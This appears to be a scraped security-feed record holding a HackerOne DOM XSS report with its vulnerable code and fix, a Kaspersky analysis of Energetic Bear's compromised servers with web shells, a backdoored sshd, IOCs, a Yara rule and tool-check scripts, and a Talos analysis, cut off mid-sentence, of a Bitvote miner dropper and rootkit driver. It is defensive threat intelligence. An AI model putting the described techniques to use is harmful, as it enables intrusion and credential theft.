"bounty": 0.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/024/342/c0710f1ee32ac577833e15c7883ae5724fb52f9d_small.?1510424447", "medium": "https://profile-photos.hackerone-user-content.com/000/024/342/26e2ce2d50254c283beb49a15389d98bee2985b1_medium.?1510424447"}, "handle": "ed", "url": "https://hackerone.com/ed"}, "bountyState": "resolved", "description": "Hi,\n\nThere's a DOM XSS vulnerability on [edoverflow.com](https://edoverflow.com/tools/respond/). This cannot be exploited without user-interaction so I had to make a clickjacking PoC to trick the user in triggering the payload her/himself.\n\n#Reproduction Steps\n1. Open the attached HTML document in FireFox.\n2. Drag Frog 1 to the other (two) frogs.\n3. Click on the \"Make friends!\" button.\n\nResult: \n{F289573}\n\n# Vulnerable JavaScript\n\n```\n<html>\n<script>\n/* ===========================================\n Allow users to submit usernames and store \n them in localStorage for future use.\n============================================*/\ndocument.getElementById(\"form\").addEventListener(\"submit\", function(){\n var triager = document.getElementById(\"triager\").value;\n var hacker = document.getElementById(\"hacker\").value;\n console.log(hacker); // Why is this not executing?\n document.body.innerHTML = document.body.innerHTML.replace('{{triager}}', triager);\n document.body.innerHTML = document.body.innerHTML.replace('{{username}}', hacker);\n //localStorage.setItem(\"triager\", triager);\n\n//var retrieve = localStorage.getItem(\"triager\"); // Why does this return \"null\"?\n//document.body.innerHTML = document.body.innerHTML.replace('{{triager}}', retriev\ndocument.getElementById(\"remove\").addEventListener(\"click\", function(){\n localStorage.removeItem(\"triager\");\n});\n</script>\n</html>\n```\n\n#Fix\n\n~~~diff\n- <input type=\"submit\" name=\"submit\" class=\"button\">\n+ <input type=\"button\" class=\"button\" id=\"submit\">\n~~~\n\n~~~diff\n Allow users to submit usernames and store \n them in localStorage for future use.\n ============================================*/\n- document.getElementById(\"form\").addEventListener(\"submit\", function(){\n- var triager = document.getElementById(\"triager\").value;\n- var hacker = document.getElementById(\"hacker\").value;\n+ elem = document.getElementsByTagName(\"pre\")[0].children[0];\n+\n+ document.getElementById(\"submit\").addEventListener(\"click\", function(){\n+ var trger = document.getElementById(\"triager\").value;\n+ var hckr = document.getElementById(\"hacker\").value;\n console.log(hacker); // Why is this not executing?\n- document.body.innerHTML = document.body.innerHTML.replace('{{triager}}', triager);\n- document.body.innerHTML = document.body.innerHTML.replace('{{username}}', hacker);\n- //localStorage.setItem(\"triager\", triager);\n+ elem.innerText = elem.innerText.replace(\"{{username}}\", trger).replace(\"{{triager}}\", hckr);\n+ localStorage.setItem(\"triager\", trger);\n });\n \n- //var retrieve = localStorage.getItem(\"triager\"); // Why does this return \"null\"?\n- //document.body.innerHTML = document.body.innerHTML.replace('{{triager}}', retrieve);\n+ if(localStorage.getItem(\"triager\") != null) {\n+ var trger = localStorage.getItem(\"triager\"); // Why does this return \"null\"?\n+ elem.innerText = elem.innerText.replace(\"{{triager}}\", trger);\n+ }\n \n document.getElementById(\"remove\").addEventListener(\"click\", function(){\n localStorage.removeItem(\"triager\");\n });\n\n~~~\n\nRaw (JS attached)\n\n## Impact\n\nThere is not much that can be done because it looks like most pages don't require authentication, I also don't think that the owner of this website would fall for something like this. ;)\n\n\nThanks,\nKarel.\n\nThe hacker selected the **Cross-site Scripting (XSS) - DOM** weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:\n\n**URL**\nhttps://edoverflow.com/tools/respond/\n\n**Verified**\nYes\n\n", "edition": 1, "reporter": "karel_origin", "published": "2018-04-23T11:01:15", "title": "Ed: DOM XSS in edoverflow.com/tools/respond due to unsafe usage of the innerHTML property.", "type": "hackerone", "enchantments": {}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/077/693/7a4e7b987a654de89c2495e1e443b7be6edb8db3_small.jpg?1467040011"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/karel_origin", "username": "karel_origin"}, "bulletinFamily": "bugbounty", "cvelist": [], "modified": "2018-04-23T11:28:11", "id": "H1:341969", "href": "https://hackerone.com/reports/341969", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2018-04-23T16:36:57", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "\n\n[_Energetic Bear/Crouching Yeti_](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080817/EB-YetiJuly2014-Public.pdf>)_ is a widely known APT group active since at least 2010. The group tends to attack different companies with a strong focus on the energy and industrial sectors. Companies attacked by Energetic Bear/Crouching Yeti are geographically distributed worldwide with a more obvious concentration in Europe and the US. In 2016-2017, the number of attacks on companies in Turkey increased significantly. _\n\n_The main tactics of the group include sending phishing emails with malicious documents and infecting various servers. The group uses some of the infected servers for auxiliary purposes \u2013 to host tools and logs. Others are deliberately infected to use them in waterhole attacks in order to reach the group's main targets. _\n\n_Recent activity of the group against US organizations was discussed in a _[_US-CERT_](<https://www.us-cert.gov/ncas/alerts/TA18-074A>)_ advisory, which linked the actor to the Russian government, as well as an advisory by the _[_UK National Cyber Security Centre_](<https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control>)_. _\n\n_This report by _[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_ presents information on identified servers that have been infected and used by the group. The report also includes the findings of an analysis of several webservers compromised by the Energetic Bear group during 2016 and in early 2017_.\n\n## Attack victims\n\nThe table below shows the distribution of compromised servers (based on the language of website content and/or the origins of the company renting the server at the time of compromise) by countries, attacked company types and the role of each server in the overall attack scheme. Victims of the threat actor's attacks were not limited to industrial companies.\n\n**Table 1. Compromised servers**\n\n**Country** | **Description** | **Role in the attack** \n---|---|--- \n**Russia** | Opposition political website | Waterhole \nReal estate agency | Auxiliary (collecting user data in the waterhole attack) \nFootball club | Waterhole \nDeveloper and integrator of secure automation systems and IS consultant | Waterhole \nDevelopers of software and equipment | Auxiliary (collecting user data in the waterhole attack, tool hosting) \nInvestment website | Auxiliary (collecting user data in the waterhole attack) \n**Ukraine** | Electric power sector company | Waterhole \nBank | Waterhole \n**UK** | Aerospace company | Waterhole \n**Germany** | Software developer and integrator | Waterhole \nUnknown | Auxiliary (collecting user data in the waterhole attack) \n**Turkey** | Oil and gas sector enterprise | Waterhole \nIndustrial group | Waterhole \nInvestment group | Waterhole \n**Greece** | Server of a university | Auxiliary (collecting user data in the waterhole attack) \n**USA** | Oil and gas sector enterprise | Waterhole \n**Unknown** | Affiliate network site | Auxiliary (collecting user data in the waterhole attack) \n \n## Waterhole\n\nAll waterhole servers are infected following the same pattern: injecting a link into a web page or JS file with the following file scheme: file://IP/filename.png.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-1.png>)\n\n_Injected link with the file scheme_\n\nThe link is used to initiate a request for an image, as a result of which the user connects to the remote server over the SMB protocol. In this attack type, the attackers' goal is to extract the following data from the session:\n\n * user IP,\n * user name,\n * domain name,\n * NTLM hash of the user's password.\n\nIt should be noted that the image requested using the link is not physically located on the remote server.\n\n## Scanned resources\n\nCompromised servers are in some cases used to conduct attacks on other resources. In the process of analyzing infected servers, numerous websites and servers were identified that the attackers had scanned with various tools, such as nmap, dirsearch, sqlmap, etc. (tool descriptions are provided below).\n\n**Table 2. Resources that were scanned from one of the infected servers**\n\n**Country \n(based on the content)** | **Description** \n---|--- \n**Russia** | Non-profit organization \nSale of drugs \nTravel/maps \nResources based on the Bump platform (platform for corporate social networks) \u2013 non-profit organization, social network for college/university alumni, communication platform for NGOs, etc. \nBusiness \u2013 photographic studio \nIndustrial enterprise, construction company \nDoor manufacturing \nCryptocurrency exchange \nConstruction information and analysis portal \nPersonal website of a developer \nVainah Telecom IPs and Subnets (Chechen Republic) \nVarious Chechen resources (governmental organizations, universities, industrial enterprises, etc.) \nWeb server with numerous sites (alumni sites, sites of industrial and engineering companies, etc.) \nMuslim dating site \n**Brazil** | Water treatment \n**Turkey** | Hotels \nEmbassy in Turkey \nSoftware developer \nAirport website \nCity council website \nCosmetics manufacturer \nReligious website \nTurktelekom subnet with a large number of sites \nTelnet Telecom subnet with a large number of sites \n**Georgia** | Personal website of a journalist \n**Kazakhstan** | Unknown web server \n**Ukraine** | Office supplies online store \nFloral business \nImage hosting service \nOnline course on sales \nDealer of farming equipment and spare parts \nUkrainian civil servant's personal website \nOnline store of parts for household appliance repair \nTimber sales, construction \nTennis club website \nOnline store for farmers \nOnline store of massage equipment \nOnline clothes store \nWebsite development and promotion \nOnline air conditioner store \n**Switzerland** | Analytical company \n**US** | Web server with many domains \n**France** | Web server with many domains \n**Vietnam** | Unknown server \n**International** | Flight tracker \n \nThe sites and servers on this list do not seem to have anything in common. Even though the scanned servers do not necessarily look like potential final victims, it is likely that the attackers scanned different resources to find a server that could be used to establish a foothold for hosting the attackers' tools and, subsequently, to develop the attack.\n\nPart of the sites scanned may have been of interest to the attackers as candidates for hosting waterhole resources.\n\nIn some cases, the domains scanned were hosted on the same server; sometimes the attackers went through the list of possible domains matching a given IP.\n\nIn most cases, multiple attempts to compromise a specific target were not identified \u2013 with the possible exception of sites on the Bump platform, flight tracker servers and servers of a Turkish hotel chain.\n\nCuriously, the sites scanned included a web developer's website, kashey.ru, and resources links to which were found on this site. These may have been links to resources developed by the site's owner: [www.esodedi.ru](<http://www.esodedi.ru>), [www.i-stroy.ru](<http://www.i-stroy.ru>), [www.saledoor.ru](<http://www.saledoor.ru>)\n\n## Toolset used\n\n### Utilities\n\nUtilities found on compromised servers are open-source and publicly available on GitHub:\n\n * Nmap \u2013 an open-source utility for analyzing the network and verifying its security.\n * [Dirsearch](<https://github.com/maurosoria/dirsearch>) \u2014 a simple command-line tool for brute forcing (performing exhaustive searches of) directories and files on websites.\n * [Sqlmap](<https://github.com/sqlmapproject/sqlmap>) \u2014 an open-source penetration testing tool, which automates the process of identifying and exploiting SQL injection vulnerabilities and taking over database servers.\n * [Sublist3r](<https://github.com/aboul3la/Sublist3r>) \u2014 a tool written in Python designed to enumerate website subdomains. The tool uses open-source intelligence ([OSINT](<https://ru.wikipedia.org/wiki/OSINT>)). Sublist3r supports many different search engines, such as Google, Yahoo, Bing, Baidu and Ask, as well as such services as Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. The tool helps penetration testers to collect information on the subdomains of the domain they are researching.\n * [Wpscan](<https://github.com/wpscanteam/wpscan>) \u2014 a WordPress vulnerability scanner that uses the blackbox principle, i.e., works without access to the source code. It can be used to scan remote WordPress sites in search of security issues.\n * [Impacket](<https://github.com/CoreSecurity/impacket>) \u2014 a toolset for working with various network protocols, which is required by SMBTrap.\n * [SMBTrap](<https://github.com/CylanceSPEAR/SMBTrap>) \u2014 a tool for logging data received over the SMB protocol (user IP address, user name, domain name, password NTLM hash).\n * [Commix](<https://github.com/commixproject/commix>) \u2014 a vulnerability search and command injection and exploitation tool written in Python.\n * [Subbrute](<https://github.com/TheRook/subbrute>) \u2013 a subdomain enumeration tool available for Python and Windows that uses an open name resolver as a proxy and does not send traffic to the target DNS server.\n * [PHPMailer](<https://github.com/PHPMailer/PHPMailer>) \u2013 a mail sending tool.\n\nIn addition, a custom Python script named ftpChecker.py was found on one of the servers. The script was designed to check FTP hosts from an incoming list.\n\n### Malicious php files\n\nThe following malicious php files were found in different directories in the nginx folder and in a working directory created by the attackers on an infected web servers:\n\n**File name** | **Brief description** | **md5sum** | **Time of the latest file change (MSK)** | **Size, bytes** \n---|---|---|---|--- \nini.php | wso shell+ mail | f3e3e25a822012023c6e81b206711865 | 2016-07-01 15:57:38 | 28786 \nmysql.php | wso shell+ mail | f3e3e25a822012023c6e81b206711865 | 2016-06-12 13:35:30 | 28786 \nopts.php | wso shell | c76470e85b7f3da46539b40e5c552712 | 2016-06-12 12:23:28 | 36623 \nerror_log.php | wso shell | 155385cc19e3092765bcfed034b82ccb | 2016-06-12 10:59:39 | 36636 \ncode29.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 11:10:40 | 10724 \nproxy87.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 14:31:13 | 10724 \ntheme.php | wso shell | 2292f5db385068e161ae277531b2e114 | 2017-05-16 17:33:02 | 133104 \nsma.php | PHPMailer | 7ec514bbdc6dd8f606f803d39af8883f | 2017-05-19 13:53:53 | 14696 \nmedia.php | wso shell | 78c31eff38fdb72ea3b1800ea917940f | 2017-04-17 15:58:41 | 1762986 \n \nIn the table above:\n\n * Web shell is a script that allows remote administration of the machine.\n * WSO is a popular web shell and file manager (it stands for \"Web Shell by Orb\") that has the ability to masquerade as an error page containing a hidden login form. It is available on GitHub:\n\n<https://github.com/wso-shell/WSO>\n\nTwo of the PHP scripts found, ini.php and mysql.php, contained a WSO shell concatenated with the following email spamming script:\n\n<https://github.com/bediger4000/php-malware-analysis/tree/master/db-config.php>\n\nAll the scripts found are obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124233/180418-energetic-bear-crouching-yeti-2.png>)\n\n_wso shell \u2013 error_log.php_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-3.png>)\n\n_Deobfuscated wso shell \u2013 error_log.php_\n\nOne of the web shells was found on the server under two different names (proxy87.php and code29.php). It uses the eval function to execute a command sent via HTTP cookies or a POST request:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-4.png>)\n\n_Web shell \u2013 proxy87.php_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-5.png>)\n\n_Deobfuscated web shell \u2013 proxy87.php_\n\n### Modified sshd\n\nA modified sshd with a preinstalled backdoor was found in the process of analyzing the server.\n\nPatches with some versions of backdoors for sshd that are similar to the backdoor found are available on GitHub, for example:\n\n<https://github.com/jivoi/openssh-backdoor-kit>\n\nCompilation is possible on any OS with binary compatibility.\n\nAs a result of replacing the original sshd file with a modified one on the infected server, an attacker can use a 'master password' to get authorized on the remote server, while leaving minimal traces (compared to an ordinary user connecting via ssh).\n\nIn addition, the modified sshd logs all legitimate ssh connections (this does not apply to the connection that uses the 'master password'), including connection times, account names and passwords. The log is encrypted and is located at /var/tmp/.pipe.sock.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124232/180418-energetic-bear-crouching-yeti-6.png>)\n\n_Decrypted log at /var/tmp/.pipe.sock_\n\n## Activity of the attackers on compromised servers\n\nIn addition to using compromised servers to scan numerous resources, other attacker activity was also identified.\n\nAfter gaining access to the server, the attackers installed the tools they needed at different times. Specifically, the following commands for third-party installations were identified on one of the servers:\n\n * apt install traceroute\n * apt-get install nmap\n * apt-get install screen\n * git clone https://github.com/sqlmapproject/sqlmap.git\n\nAdditionally, the attackers installed any packages and tools for Python they needed.\n\nThe diagram below shows times of illegitimate logons to one of the compromised servers during one month. The attackers checked the smbtrap log file on working days. In most cases, they logged on to the server at roughly the same time of day, probably in the morning hours:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/18124231/180418-energetic-bear-crouching-yeti-7.png>)\n\n_Times of illegitimate connections with the server (GMT+3)_\n\nIn addition, in the process of performing the analysis, an active process was identified that exploited SQL injection and collected data from a database of one of the victims.\n\n## Conclusion\n\nThe findings of the analysis of compromised servers and the attackers' activity on these servers are as follows:\n\n 1. With rare exceptions, the group's members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group 'markers' very difficult.\n 2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.\n 3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.\n 4. The diversity of victims may indicate the diversity of the attackers' interests.\n 5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack's further development.\n\n## Appendix I \u2013 Indicators of Compromise\n\n### Filenames and Paths\n\n#### Tools*\n\n/usr/lib/libng/ftpChecker.py \n/usr/bin/nmap/ \n/usr/lib/libng/dirsearch/ \n/usr/share/python2.7/dirsearch/ \n/usr/lib/libng/SMBTrap/ \n/usr/lib/libng/commix/ \n/usr/lib/libng/subbrute-master/ \n/usr/share/python2.7/sqlmap/ \n/usr/lib/libng/sqlmap-dev/ \n/usr/lib/libng/wpscan/ \n/usr/share/python2.7/wpscan/ \n/usr/share/python2.7/Sublist3r/\n\n*Note that these tools can also be used by other threat actors.\n\n#### PHP files:\n\n/usr/share/python2.7/sma.php \n/usr/share/python2.7/theme.php \n/root/theme.php \n/usr/lib/libng/media.php\n\n#### Logs\n\n/var/tmp/.pipe.sock\n\n### PHP file hashes\n\nf3e3e25a822012023c6e81b206711865 \nc76470e85b7f3da46539b40e5c552712 \n155385cc19e3092765bcfed034b82ccb \n1644af9b6424e8f58f39c7fa5e76de51 \n2292f5db385068e161ae277531b2e114 \n7ec514bbdc6dd8f606f803d39af8883f \n78c31eff38fdb72ea3b1800ea917940f\n\n### Yara rules\n\nrule Backdoored_ssh { \nstrings: \n$a1 = \"OpenSSH\" \n$a2 = \"usage: ssh\" \n$a3 = \"HISTFILE\" \ncondition: \nuint32(0) == 0x464c457f and filesize<1000000 and all of ($a*) \n}\n\n## Appendix II \u2013 Shell script to check a server for tools\n\n### Shell script for Debian\n\ncd /tmp \nworkdir=428c5fcf495396df04a459e317b70ca2 \nmkdir $workdir \ncd $workdir \nfind / -type d -iname smbtrap > find-smbtrap.txt 2>/dev/null \nfind / -type d -iname dirsearch > find-dirsearch.txt 2>/dev/null \nfind / -type d -iname nmap > find-nmap.txt 2>/dev/null \nfind / -type d -iname wpscan > find-wpscan.txt 2>/dev/null \nfind / -type d -iname sublist3r > find-sublist3r.txt 2>/dev/null \ndpkg -l | grep -E \\\\(impacket\\|pcapy\\|nmap\\\\) > dpkg-grep.txt \ncp /var/lib/dpkg/info/openssh-server.md5sums . #retrieve initial hash for sshd \nmd5sum /usr/sbin/sshd > sshd.md5sum #calculate actual hash for sshd\n\n### Shell script for Centos\n\ncd /tmp \nworkdir=428c5fcf495396df04a459e317b70ca2 \nmkdir $workdir \ncd $workdir \nfind / -type d -iname smbtrap > find-smbtrap.txt 2>/dev/null \nfind / -type d -iname dirsearch > find-dirsearch.txt 2>/dev/null \nfind / -type d -iname nmap > find-nmap.txt 2>/dev/null \nfind / -type d -iname wpscan > find-wpscan.txt 2>/dev/null \nfind / -type d -iname sublist3r > find-sublist3r.txt 2>/dev/null \nrpm -qa | grep -E \\\\(impacket\\|pcapy\\|nmap\\\\) > rpm-grep.txt \nrpm -qa -dump | grep ssh > rpm-qa-dump.txt #retrieve initial hash for sshd \nsha256sum /usr/sbin/sshd > sshd.sha256sum #calculate actual sha256 hash for sshd \nmd5sum /usr/sbin/sshd > sshd.md5sum #calculate actual md5 hash for sshd\n\n[ **Energetic Bear/Crouching Yeti: attacks on servers**](<https://ics-cert.kaspersky.com/media/EB_public_FINAL_EN_20042018.pdf>)", "reporter": "Kaspersky Lab ICS CERT", "published": "2018-04-23T10:00:36", "type": "securelist", "title": "Energetic Bear/Crouching Yeti: attacks on servers", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T10:00:36", "id": "SECURELIST:5120B9325810A974F19B2E365EC8516C", "href": "https://securelist.com/energetic-bear-crouching-yeti/85345/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2018-04-23T18:38:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "### Executive summary\n\n \nSoon after a launch of a new cryptocurrency, Bitvote, in January, Talos discovered a new mining campaign affecting systems in India, Indonesia, Vietnam and several other countries that was tied to Bitvote. \n \nApart from the fact that the attackers have chosen to target the new bitcoin fork in order to gain the early adoption advantage, this campaign is notable for its usage of a kernel-mode driver to manage command and control (C2) infrastructure, configuration management, download and execute functionality, as well as payload protection. It is quite uncommon to implement this functionality in kernel, apart from the payload protection, and points to a moderate to high level of technical knowledge behind the attack. \n \nThe payloads and the configuration were embedded in specially modified animated GIF files and published as parts of web pages hosted on free blogging platforms. \n \nThe campaign was active in February and March, and so far, it has brought limited returns for attackers. \n \n \n \n\n\n### Introduction\n\n \nOne of the benefits of open-source projects is the ability for other people to create so-called \"forks\" \u2014 copies of the original source code repository and to essentially split (fork) the development process in two by creating a separate project with a new development team and a separate development process. \n \nForks also happen with cryptocurrencies. Since the initial release of bitcoin, there has been more than 18,000 forks of bitcoin code on the hosting service GitHub, although only a few of them have successfully been launched as alternatives to bitcoin. \n \nWhile some, such as Bitcoin Cash, Bitcoin Gold or Litecoin have been fairly successful, most new forks die out without being noticed by a significant number of users. \n \nA frequent reason that forks are created is to improve on the so-called \"one-CPU-one-vote\" principle, which prescribes rules on how the network decides on a transaction's validity. In the original plan laid out by [Bitcoin creator Satoshi Nakamoto](<https://www.google.com/url?q=https://bitcoin.org/bitcoin.pdf&sa=D&ust=1524498497022000>), the miner is awarded proportionally to the amount of computing resources they invested, without explicit mention of the type of hardware that should be used for mining. However, some people took the \"one-CPU-one-vote\" principle \u2014 quite literally \u2014 to mean that desktop CPUs should exclusively be used for mining. \n \nNevertheless, the original practice of bitcoin mining has moved away from using standard desktop system CPUs and GPUs, and into the realm of specialized ASIC-based hardware systems, requiring a significant up-front investment to achieve notable returns for miners. \n \nThis development has seen many home users moving away from mining bitcoin into mining other currencies such as Monero, which is specifically designed to make mining using ASIC more difficult. Monero also increasingly became the currency of choice for malicious mining botnets, which we already covered in [one of our recent blog posts](<https://www.google.com/url?q=https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&sa=D&ust=1524498497023000>). \n \nOn Jan. 20, an unknown group of developers launched a new bitcoin fork called [Bitvote](<https://www.google.com/url?q=https://bitvote.one/&sa=D&ust=1524498497024000>), with their own view on how to improve on the \"one-CPU-one-vote\" principle, and give desktop users a fairer chance to successfully mine a cryptocurrency. \n \nBitvote uses the [Cryptonight](<https://www.google.com/url?q=https://en.bitcoin.it/wiki/CryptoNight&sa=D&ust=1524498497024000>) algorithm for its proof of work, which is also used by Monero. The algorithm is designed to allow standard desktop CPUs to be equal participants in the mining process. \n \nAs cyber criminals move farther away from ransomware, and closer to cryptocurrency mining, it comes as no surprise to find out that a malicious actor decided to take a gamble on Bitvote, and developed a malicious campaign that resulted in the infection of hundreds of systems with a modified version of the cpuminer mining software, recruiting the affected systems into a Bitvote mining pool. \n \nThis post is focused on the driver functionality of Bitvote, although we briefly describe the dropper, as well as the final cryptocurrency mining payload used in this campaign. \n \n\n\n### Calculator with unexpected functionality: The dropper\n\n \nA driver dropper, purporting to be a calculator application was found by investigating [AMP for Endpoints](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html&sa=D&ust=1524498497025000>) product telemetry. The dropper was spotted in the wild, and blocked on Feb. 6. It is likely to have been a part of a (potentially) unwanted application installer published on sites hosting an alleged version of Microsoft Toolkit, which should allow the user to activate different versions of Microsoft Office and Windows without owning a valid license. \n \nA Microsoft Toolkit bundler installs many potentially unwanted applications (PUAs), but it also installs a file calculator<nnnn>.exe that drops a randomly named kernel mode driver. Earlier calculator dropper variants have been around at least since the last quarter of 2017. \n \nTypically, the malicious functionality of the dropper (written using MFC framework) is to install the driver in the <Windows>\\system32\\drivers folder with eight random characters' base filename (eg. djkeuihk.sys), or with the original name of the driver, which is DrToolKrl.sys. After creating the driver, the dropper creates a Windows service with the same name, as the driver file loads the driver into the kernel memory by starting the service. \n \nBefore dropping the driver, the dropper checks if it is executing in a virtual machine environment, under a control of a debugger or in a sandbox. If a virtual machine environment is detected, the malicious driver is not dropped, and the execution continues with a calculator functionality. \n \n\n\n[](<https://2.bp.blogspot.com/--4fRvFciEpg/Wt31CTvxk5I/AAAAAAAAAHA/xD9k7Mw5EO4-LPHQCHAB96WzjI_bfN9GwCLcBGAs/s1600/image5.gif>)\n\nTrojanized Calculator GUI\n\n \nThe dropper checks for the following environments: \n \n\n\n * Parallels\n * VMWare\n * VirtualBox\n * JoeBox\n * GFI Sandbox (CWSandbox)\n * Anubis\n * Sandboxie\n * Debugging Tools for Windows\n \n \nIf a debugging or analysis environment is not detected, the dropper checks the version of the operating system in order to drop an appropriate, 32- or 64-bit version of the rootkit driver. It also attempts to communicate with the driver in order to make sure that the driver is not already loaded. \n \n\n\n[](<https://4.bp.blogspot.com/-GLkOgm74tzE/Wt31VngNS0I/AAAAAAAAAHI/m-WBmEQj3cgY6qzHn4TGwor2wwp1PwljgCLcBGAs/s1600/image3.png>)\n\nCheck for the bitness of the operating system and prepare to drop a driver\n\n \n\n\n### Main culprit: The driver\n\n \nThe driver is signed with a certificate belonging to \"Jiangsu innovation safety assessment Co., Ltd.\" with expired validity period. This means that it will not be loaded by Windows Vista and later versions of 64-bit Windows, which enforce valid driver signatures. On the one hand, this seems like a failure of the attacker's process, as the attack can only target older Windows versions, likely executing on less capable CPUs. On the other hand, it may prove to be an advantage for the attacker, as it is more likely that older systems are not fully up to date and protected with the latest security software. Therefore, this attack is less likely to be discovered if only older CPUs are affected. \n \nThe driver contains the functionality to: \n \n\n\n * Manage configuration of the C2 infrastructure\n * Parse configuration files hosted on free blogging platforms to decode the information hidden in animated GIF files published as part of the C2 blogs.\n * Download and execute the final payload (in our case, the Bitvote pool miner agent)\n * Protect the driver from deletion\n * Protect the driver registry entry from third-party access (read and write)\n * Protect payload processes and threads from termination\n * Download and install new driver versions \n * Disable the User Account Control (UAC)\n \n \nApart from the core driver's ability to protect itself and its payload, the driver somewhat unusually contains the download and execute functionalities, which is rarely implemented in kernel mode by well-known malware downloader families. \n \nThis indicates an increased level of proficiency of the author of the driver, who might also be the actor behind this Bitvote mining operation. \n \nHowever, it is also possible that the driver is created by a generic third party toolkit, which would allow an actor to specify configuration and payload URLs in a simple way. Once the configuration is specified, the toolkit might be used to build and sign the driver, which could also explain the fact that the driver samples were signed with an expired certificate. However, we were not able to find generator samples that would confirm this theory. \n \n\n\n#### Configuration management\n\n \nThe driver initially contained several hardcoded URLs pointing to free blogging platforms, such as Blogspot (Blogger) and Russian blogging platform LiveJournal. Before the hardcoded URLs are accessed, the dropper attempts to download a GIF file from a special URL hardcoded in the dropper body. \n \nThe downloaded GIF file contains an encrypted data blob at offset 0xA0000, with a driver configuration block including the new command and control locations, as well as updated URLs for downloads of payloads. The configuration data block starts with a header containing a magic double word 'lKTD' ('DTKl'), followed by a double word containing a simple addition-based checksum of all bytes in decoded configuration, a static double word XOR decryption key and a double word count of configuration records within the block. \n \n\n\n[](<https://4.bp.blogspot.com/-s5HqSofLj0U/Wt31oGUyk9I/AAAAAAAAAHQ/FU7Fat-AXNk8WEAgYHzBT2GA5d9H16dtgCLcBGAs/s1600/image13.png>)\n\nDownload and decode driver configuration\n\n \nEach configuration record size is 407 bytes long, and contains a type of the record, which may indicate a payload record, a driver update record or C2 record, followed by a URL, as well as pointers to HTML parsing functions, the local file paths and arguments that should be used when they are launched. \n \nThe configuration is decoded and loaded into the DeviceExtension block of the device object created by the driver in the DriverEntry function. The device extension block is the most important data structure associated with a device object. Its internal structure is driver-defined, and it is typically used to maintain device state information and provide storage for any kernel-defined objects. In our case, the DeviceExtension also stores the in-memory configuration of the malicious driver. \n \n\n\n[](<https://1.bp.blogspot.com/-DBuptSJpLFc/Wt4KCmWsjSI/AAAAAAAAAI8/eWU0sC4sKEINXLsLgFSSHYxSUsMkeHbAwCLcBGAs/s1600/image15a.png>)\n\nThe GIF containing the driver configuration\n\n \nThe IP address of any host is resolved by querying Google's DNS resolver 8.8.8.8. Defenders are advised to block direct traffic from standard internal network endpoints to external DNS resolvers, which would prevent the driver from downloading and executing payloads, as well as connecting to the botnet C2 servers, internally referred to as the \"Heart servers.\" \n \nThe host used as the Heart server in this campaign was cdn[.]rmb666[.]me. At the time of the analysis, the domain name resolved to 185.180.14.16, which is also associated with other malicious domains. The domain was registered on Dec. 20, 2017, and it seems to have been used specifically for this campaign. The IP address is hosted in the Czech Republic. The domain has now changed the provider,and it points to 91.213.8.57, an IP address hosted in Ukraine. \n \nThe country graph taken from the Cisco Umbrella Investigate tool indicates that the campaign was the most active in Indonesia with many other countries, such as India, Algeria and Vietnam being affected. \n \n\n\n[](<https://2.bp.blogspot.com/-4KYWSG13N8c/Wt31_m4YQ4I/AAAAAAAAAHc/LE6DZSSUx70Q4Fhm8Zo-Kept7kbEYxvkACLcBGAs/s1600/image4.png>)\n\nThe top affected countries are Indonesia and India\n\n \nThe driver uses fairly specific User-Agent string 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/520.16 (KHTML, like Gecko) Chrome/61 Safari/517' when posting the initial data to the C2 server, which may be a good network detection indicator. \n \n\n\n[](<https://4.bp.blogspot.com/-phwqkya8Bbo/Wt32WBZlnvI/AAAAAAAAAHo/rgUGRlL9jScY1nOzaX-UFhRWV23Y5yE_wCLcBGAs/s1600/image7.png>)\n\nInitial Heart server post request example\n\n \n\n\n#### Download and execute functionality\n\n \nOnce the configuration is uploaded, the driver loops over the records and attempts to access the specified URLs. If a URL hosts an HTML file, the driver will parse the page to find an image URL which satisfies a criteria set in the associated HTML parsing function. \n \nIf a target image URL is found, the driver will download the image file. The downloaded image files were GIF images with a PE executable payload simply appended to it. The driver then extracts the payload from the image, saves the payload into a destination path set by the configuration record and executes it by changing the process context into Windows Explorer (explorer.exe) and launching the downloaded file using the standard WinExec Windows 